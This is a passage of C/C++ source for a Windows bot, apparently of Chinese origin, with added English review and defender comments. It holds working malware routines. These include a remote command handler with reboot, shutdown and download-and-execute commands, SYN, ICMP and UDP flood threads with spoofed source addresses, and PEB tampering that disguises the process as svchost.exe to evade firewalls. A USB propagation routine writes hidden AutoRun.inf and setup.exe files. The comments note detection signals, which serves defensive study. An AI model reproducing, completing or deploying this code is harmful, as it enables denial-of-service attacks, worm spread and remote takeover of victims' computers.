::CreateThread(NULL,0,SynFlood,NULL,0,NULL);
::CreateThread(NULL,0,UDP_flood,NULL,0,NULL);
}
break;
case 97://重起
{
SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
ExitWindowsEx(EWX_REBOOT,0);
}
break;
case 98://关机
{
SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
ExitWindowsEx(EWX_SHUTDOWN,0);
}
break;
case 99://卸载
{
StopMyService();
char SysDirBuff[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcat(SysDirBuff,"\\drivers\\svchost.exe");
MoveFileEx(SysDirBuff,"abc.bak",MOVEFILE_DELAY_UNTIL_REBOOT);
ExitProcess(0);
}
break;
case 100://stop thread
stopfuck=true;
break;
case 101://down & run
DownExec(fuckweb.FuckIP);
break;
case 102://open url
OpenUrl(fuckweb.FuckIP);
break;
default:
break;
}
}
break;
case FD_CLOSE:
//MessageBox(NULL,"FD_CLOSE",NULL,MB_OK);
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
PostQuitMessage(0);
WSACleanup();
break;
case WM_DEVICECHANGE://
if(modify_data.IsUpan)
OnDeviceChange(hWnd,wParam,lParam);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
//*********************************************************
/***********************************************/
//Get System Information
// Fills a SYSTEMINIT record with the host fingerprint this service reports
// back: computer name, a coarse OS label, physical memory in MB, a fixed
// version string (it looks like a date) and the connect password taken from
// the global modify_data. Returns false only when GetComputerName or
// GetVersionEx fails; every other step is best-effort.
// SYSTEMINIT, modify_data and the field sizes are declared elsewhere in the
// project and are not visible here.
bool GetSystemInfo(SYSTEMINIT& sysinfo)
{
/////get computer name///////
memset(sysinfo.computer,0,sizeof(sysinfo.computer));
DWORD len=sizeof(sysinfo.computer);
if(!GetComputerName(sysinfo.computer,&len))
return false;
///////get system version//////////
// NOTE(review): GetVersionEx is a legacy API; on newer Windows the version
// it reports depends on the application manifest, so the labels below only
// cover the NT 4 .. 2003 / 9x range this code was written against.
sysinfo.os[0]=0;
OSVERSIONINFO osvi;
memset(&osvi,0,sizeof(osvi));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(!GetVersionEx(&osvi))
return false;
// Map major/minor to a label. The strcat calls are not bounded by
// sizeof(sysinfo.os), and a version that matches no case leaves os empty.
switch (osvi.dwPlatformId)
{
case VER_PLATFORM_WIN32_NT:
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2 )
strcat(sysinfo.os,"Windows2003");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 )
strcat(sysinfo.os,"WindowsXP");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0 )
strcat(sysinfo.os,"Windows2000");
if ( osvi.dwMajorVersion <= 4 )
strcat(sysinfo.os,"WindowsNT");
break;
case VER_PLATFORM_WIN32_WINDOWS:
if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 0)
strcat(sysinfo.os,"Windows95");
if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 10)
strcat(sysinfo.os,"Windows98");
break;
}
////get memory size////////////////
// dwTotalPhys is a DWORD, so anything above 4 GB cannot be represented.
// The "+2" is presumably rounding slack — not explained anywhere visible.
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
memset(sysinfo.MemorySize,0,sizeof(sysinfo.MemorySize));
// itoa (non-standard) writes directly into sysinfo.MemorySize and returns
// that same pointer, so the enclosing strcpy copies the buffer onto itself
// (overlapping source/destination, which strcpy does not allow).
strcpy(sysinfo.MemorySize,itoa(mem.dwTotalPhys/1024/1024+2,sysinfo.MemorySize,10));
strcat(sysinfo.MemorySize,"MB");
///////server version//////////////////
memset(sysinfo.version,0,sizeof(sysinfo.version));
strcpy(sysinfo.version,"20070701");
///////connect pass///////////////////
// The password is carried as an int parsed from a string; atoi reports
// parse failure as 0, which is indistinguishable from a real "0".
sysinfo.Pass=atoi(modify_data.ConnectPass);
return true;
}
//------------将该进程伪装为svchost.exe----------
// Rewrites this process's own PEB so that user-mode tools that read it
// (task listings, application-firewall prompts) see
// "<systemdir>\svchost.exe" instead of the real image path. Only the PEB
// copy is changed — the kernel's view of the mapped image is untouched —
// which is exactly what defenders can check: a mismatch between the PEB's
// loader entry / ImagePathName / CommandLine and the path the kernel
// reports for the process (e.g. QueryFullProcessImageName) is a strong
// tampering indicator. The code is MSVC x86 inline asm against the 32-bit
// PEB layout of the Windows versions this file targets (see the
// hard-coded offsets below); it is not portable.
// The process enumeration only decides whether the ImagePathName field is
// also rewritten: when "rfwsrv.exe" (Rising firewall) is running that one
// write is skipped — the original author's comment says this avoids a
// blue screen, presumably a driver-side check; not verifiable here.
void ByPassFireWall()
{
char szpath[64];
// Must be static: the asm below stores this buffer's address into the PEB
// and the PEB keeps using it after this function returns, so a stack
// buffer would dangle. (Original comment: "must be a global variable, why?")
static char modulepath[128];//一定是全局变量,why?
// GetSystemDirectory is bounded to 64 but the strcat of "\\svchost.exe"
// afterwards is not — a long system directory overflows szpath.
GetSystemDirectory(szpath,64);
strcat(szpath,"\\svchost.exe");
// Widen to UTF-16 by interleaving zero bytes. Copies all 64 bytes of
// szpath regardless of the string length (exactly fills modulepath[128]).
//转化为Unicode字符 -> convert to Unicode (UTF-16) characters
for (int ii=0;ii<64;ii++)
{
modulepath[ii*2] = szpath[ii];
modulepath[ii*2+1] = 0;
}
// Detect the Rising firewall service to avoid a blue screen (original
// comment). Observations: the Snapshot handle is never closed; ProcessName
// is 32 bytes but szExeFile can be up to MAX_PATH, so the strcpy is
// unbounded; "|0x20" lower-cases ASCII letters but also alters digits and
// punctuation; `i` is counted but never used.
//检测瑞星防火墙,防止蓝屏
bool NoRing=true;
HANDLE Snapshot;
Snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 processListStr;
processListStr.dwSize=sizeof(PROCESSENTRY32);
BOOL return_value;
return_value=Process32First(Snapshot,&processListStr);
int i=0;//item index
char ProcessName[32];
while(return_value)
{
strcpy(ProcessName,processListStr.szExeFile);
for(int t=0;t<strlen(ProcessName);t++)
{
ProcessName[t]=processListStr.szExeFile[t]|0x20;
}
if(strstr(ProcessName,"rfwsrv.exe")!=NULL)
{
NoRing=false;
break;
}
return_value=Process32Next(Snapshot,&processListStr);
//获得系统进程链表中下一个进程的信息 -> fetch the next entry of the process list
i++;
}
if (NoRing)
{
// Full rewrite: loader entry (FullDllName), ImagePathName and CommandLine
// all pointed at modulepath with a hard-coded byte length of 0x60 — the
// length is not derived from the actual string.
__asm
{
MOV EAX, fs:[30h]
MOV EAX, [EAX+0xC]
MOV EAX, [EAX+0xC]
lea ebx,modulepath
mov WORD ptr[EAX+0x24],0x60
mov [EAX+0x28],ebx
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10]
lea EAX,[EAX+0x3c]
lea ebx,modulepath
mov [eax],ebx //ImagePathName->Buffer
mov WORD ptr[eax-4],0x60 //ImagePathName->Length
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[EAX+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,modulepath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
}
else
{
// Same as above minus the ImagePathName write (the only difference
// between the two blocks).
__asm
{
MOV EAX, fs:[30h]
MOV EAX, [EAX+0xC]
MOV EAX, [EAX+0xC]
lea ebx,modulepath
mov WORD ptr[EAX+0x24],0x60
mov [EAX+0x28],ebx
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[EAX+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,modulepath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
}
}
//--------------U盘传播----------------------------
// Writes an AutoRun.inf at `path` whose open / shellexecute /
// shell\Auto\command entries all point at `name` — the removable-media
// propagation stub used by CopyToUAndSet. Returns TRUE when the file was
// opened and written, FALSE when fopen failed. Nothing checks the fprintf
// results.
// Defender notes: creation of AutoRun.inf in a removable volume's root by
// anything other than an installer is a high-signal event; supported
// Windows versions no longer honour AutoRun from removable (non-optical)
// media, and the "Turn off AutoPlay" policy closes the remainder.
// NOTE(review): "w+" is text mode, and the Windows CRT expands "\n" to
// "\r\n" in text mode, so these explicit "\r\n" line ends probably come
// out as "\r\r\n" on disk — confirm against the CRT in use.
BOOL CreateAutoRunFile(char*name,char *path)
{
FILE *out;
out=fopen(path,"w+");
if(out)
{
fprintf(out,"[AutoRun]\r\n");
fprintf(out,"open=%s\r\n",name);
fprintf(out,"shellexecute=%s\r\n",name);
fprintf(out,"shell\\Auto\\command=%s\r\n",name);
fclose(out);
return TRUE;
}
else
return FALSE;
}
// Marks `path` SYSTEM|HIDDEN so that default Explorer settings do not list
// it; applied to both the copied setup.exe and the AutoRun.inf. Returns the
// SetFileAttributes result unchanged. Note this replaces the existing
// attribute set rather than OR-ing into it.
// Defender note: hidden+system on a freshly written executable in a
// removable drive's root is a good hunting rule.
BOOL SetFileAttrib(char *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
// Maps a DEV_BROADCAST_VOLUME unit bitmask to the drive letter of its
// lowest set bit (bit 0 = 'A'). Only the 26 drive positions are examined;
// a mask with none of them set yields the character after 'Z'.
char FirstDriveFromMask(ULONG unitmask)
{
char index = 0;
// Shift the mask down until bit 0 is set, counting how far we went.
while (index < 26 && (unitmask & 0x1) == 0)
{
unitmask >>= 1;
++index;
}
return (char)('A' + index);
}
// Copies this service's dropped image to "<U>:\setup.exe" on a newly
// arrived volume, writes a matching AutoRun.inf and hides both. Only U[0]
// (the drive letter) is read. Returns the result of hiding setup.exe; the
// CopyFile result is ignored, so a failed copy still returns whatever
// SetFileAttributes says about the (possibly absent) file.
// Defender note: the source path is <systemdir>\drivers\svchost.exe — the
// genuine svchost.exe lives directly in the system directory, so an
// svchost.exe under drivers\ is itself a useful hunting query.
BOOL CopyToUAndSet(char *U)
{
// This_File is 256 bytes; GetSystemDirectory is bounded to it but the
// strcat that follows is not.
char This_File[256];
memset(This_File,0,sizeof(This_File));
::GetSystemDirectory(This_File,sizeof(This_File));
strcat(This_File,"\\drivers\\svchost.exe");
char szPath[40];
sprintf(szPath,"%c:\\setup.exe",U[0]);//build the full path on the USB drive
char szAutoFile[40];
sprintf(szAutoFile,"%c:\\AutoRun.inf",U[0]);
if(CreateAutoRunFile("setup.exe",szAutoFile))
SetFileAttrib(szAutoFile);
// FALSE = overwrite an existing setup.exe.
CopyFile(This_File,szPath,FALSE);
return SetFileAttrib(szPath);
}
// WM_DEVICECHANGE handler (called from the window procedure when
// modify_data.IsUpan is set): on DBT_DEVICEARRIVAL of a volume, derives the
// drive letter from the unit mask and calls CopyToUAndSet on it. Removal
// is a no-op. Always returns 0 (LRESULT()). `hwnd` is unused.
// Only U[0] is written; the remaining bytes of U are never read.
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
char U[4];
// lParam is trusted as a DEV_BROADCAST_HDR* without any validation; for
// the events handled here it is only dereferenced on arrival.
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: //device arrival
if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//get the drive letter of the new volume
CopyToUAndSet(U);//copy to the new volume
}
break;
case DBT_DEVICEREMOVECOMPLETE: //device removed
break;
}
return LRESULT();
}
//---------------------------------------------------
/***********************************************/
//CheckSum:计算校验和的子函数
// Standard Internet (RFC 1071 style) checksum: one's-complement sum of the
// 16-bit words in `buffer`, the trailing odd byte folded in, carries folded
// back twice, then complemented. `size` is in bytes.
USHORT checksum(USHORT *buffer,int size)
{
unsigned long sum = 0;
USHORT *word = buffer;
int remaining = size;
for (; remaining > 1; remaining -= (int)sizeof(USHORT))
{
sum += *word;
++word;
}
// Odd trailing byte: read only the first byte of the next word.
if (remaining)
{
sum += *(UCHAR*)word;
}
// Fold the high half into the low half, then fold any carry that produced.
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (USHORT)(~sum);
}
/***********************************************/
// Converts a dotted-quad string or host name into a network-byte-order
// IPv4 address, returning 0 when neither inet_addr nor gethostbyname
// succeeds. A 0 result is INADDR_ANY, so callers cannot tell failure from
// "0.0.0.0". IPv4 only; the first h_addr entry is used.
unsigned long resolve(char *host)
{
long i;
struct hostent *he;
// inet_addr's failure value INADDR_NONE is 0xFFFFFFFF; the `< 0` test only
// catches it because that is -1 when viewed as a signed 32-bit long. The
// same test also treats any address with the top bit set (last octet
// >= 128 on a little-endian host) as a failure and falls through to
// gethostbyname. NOTE(review): whether gethostbyname accepts a numeric
// string is platform-dependent — confirm for the Winsock version in use.
if((i=inet_addr(host))<0)
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
/*********************SYN FLOOD**************************/
// Thread entry point for the TCP flood: builds raw IP+TCP packets with a
// random spoofed source address and alternating SYN / ACK flags, and sends
// them to fuckweb.FuckIP:FuckPort in bursts of 100 every 40 ms until the
// global `stopfuck` flag is set. `dParam` is unused. Returns 0 in all cases.
// IP_HEADER, TCP_HEADER, PSD_HEADER, fuckweb and stopfuck are declared
// elsewhere in the project.
// Defender notes: the packets carry a fixed signature — IP ID 1, TTL 128,
// DF set, window 512, source port below 1025 — and a spoofed source, so
// source-address validation at the network edge (BCP 38 / RFC 2827
// ingress filtering) drops them before they leave the host's network.
// On the host side, a raw socket with IP_HDRINCL opened by a process
// running as a service is itself an audit-worthy event (raw sockets need
// administrative rights on supported Windows versions).
// Observations: WSAStartup is called per thread with no WSACleanup, the
// socket is never closed, and the printf calls go nowhere in a service
// without a console.
unsigned long CALLBACK SynFlood(LPVOID dParam)
{
WSADATA WSAData;
WSAStartup(MAKEWORD(2,2) ,&WSAData);
SOCKET sendSocket;
SOCKADDR_IN Sin;
IP_HEADER ipHeader;
TCP_HEADER tcpHeader;
PSD_HEADER psdHeader;
char szSendBuf[1024] = "";
if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
{
printf("Socket Setup Error...\n");
return 0;
}
// IP_HDRINCL: the caller supplies the full IP header, which is what makes
// the spoofed source address possible.
BOOL flag=1;
if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR)
{
printf("Setsockopt IP_HDRINCL Error...\n");
return 0;
}
int timeout = 3000;
if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR)
{
printf("Setsockopt SO_SNDTIMEO Error...\n");
return 0;
}
// Target resolved once, before the loop; resolve() returns 0 on failure
// and that is not checked here.
Sin.sin_family = AF_INET;
Sin.sin_port=htons(fuckweb.FuckPort);
Sin.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);
char src_ip[20] = {0};
while(!stopfuck)
{
// Random source address, each octet in 1..250.
wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 );
//fill in the IP header
ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos = 0;
ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident = 1;
ipHeader.frag_and_flags = 0x40;
ipHeader.ttl = 128;
ipHeader.proto = IPPROTO_TCP;
ipHeader.checksum = 0;
ipHeader.sourceIP = inet_addr(src_ip);
ipHeader.destIP = Sin.sin_addr.s_addr;
//fill in the TCP header
tcpHeader.th_sport = htons(rand()%1025); //source port
tcpHeader.th_dport = htons( fuckweb.FuckPort );
tcpHeader.th_seq = htonl( rand()%900000000 + 1 );
tcpHeader.th_ack=rand()%3;
if (rand()%2 == 0) tcpHeader.th_flag=0x02;//SYN
else tcpHeader.th_flag=0x10;//ACK
tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_win = htons(512);
tcpHeader.th_sum = 0;
tcpHeader.th_urp = 0;
// Pseudo header for the TCP checksum.
psdHeader.saddr = ipHeader.sourceIP;
psdHeader.daddr = ipHeader.destIP;
psdHeader.mbz = 0;
psdHeader.ptcl = IPPROTO_TCP;
psdHeader.tcpl = htons(sizeof(tcpHeader));
//compute the TCP checksum (over pseudo header + TCP header, no payload)
memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );
//compute the IP checksum (computed over IP + TCP header here, not the IP header alone)
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
memset( szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), 0, 4 );
ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );
// Final frame: IP header followed by TCP header.
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
memcpy( szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
// The same frame is sent 100 times per iteration; sendto errors are ignored.
for(int a=0;a<100;a++)
{
sendto(sendSocket, szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin));
printf(".");
}
Sleep(40);
}
return 0;
}
/****************ICMP FLOOD*******************************/
// Initialises an ICMP echo-request header at the start of `icmp_data`
// (type ICMP_ECHO, code 0, id = this process id, seq and checksum 0) and
// copies the global `icmpBuffer` payload after it. `datasize` is accepted
// but never used, so nothing here bounds the memcpy — the caller passes a
// zeroed MAX_PACKET-sized block and relies on strlen(icmpBuffer) fitting.
// ICMP_HEADER, ICMP_ECHO and icmpBuffer are declared elsewhere.
// Defender note: echo requests whose identifier equals the sending
// process id (rather than a per-socket value) are a usable correlation
// key when the host is being investigated.
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
// Payload copied without its terminator; length is whatever icmpBuffer holds.
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
// Thread entry point for the ICMP echo flood: opens a raw ICMP socket,
// resolves fuckweb.FuckIP once, then sends a MAX_PACKET-byte echo request
// every 40 ms with an incrementing sequence number and a GetTickCount
// timestamp until the global `stopfuck` flag is set. `dParam` is unused.
// Returns 0 in all cases. ICMP_HEADER, MAX_PACKET, fuckweb and stopfuck are
// declared elsewhere in the project.
// Observations: the HeapAlloc result is used without a NULL check; the
// socket and heap block are never released and WSAStartup has no matching
// WSACleanup; `datasize` is computed but never used (MAX_PACKET is sent).
// Defender note: a constant-size echo stream at a fixed 40 ms cadence from
// one host, id == its process id, is straightforward to rate-limit or
// match; raw-socket creation itself needs administrative rights on
// supported Windows versions and is worth auditing.
unsigned long CALLBACK icmp_flood(LPVOID dParam)
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
return 0;
memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
// resolve() returns 0 (INADDR_ANY) on failure; not checked here.
m_addrDest.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);
datasize += sizeof(ICMP_HEADER);
// HEAP_ZERO_MEMORY already zeroes the block; the memset repeats that.
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET);
int seq_no=0;
while(!stopfuck)
{
// Checksum must be zero while it is being computed over the whole packet.
((ICMP_HEADER*)icmp_data)->i_cksum = 0;
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
// Wrap the 16-bit sequence number before it overflows the header field.
if (seq_no>=65534)
seq_no=1;
Sleep(40);
}
return 0;
}
/************************UDP ATTACK***********************************/
unsigned long CALLBACK UDP_flood(LPVOID dParam)
{
WSADATA WSAData;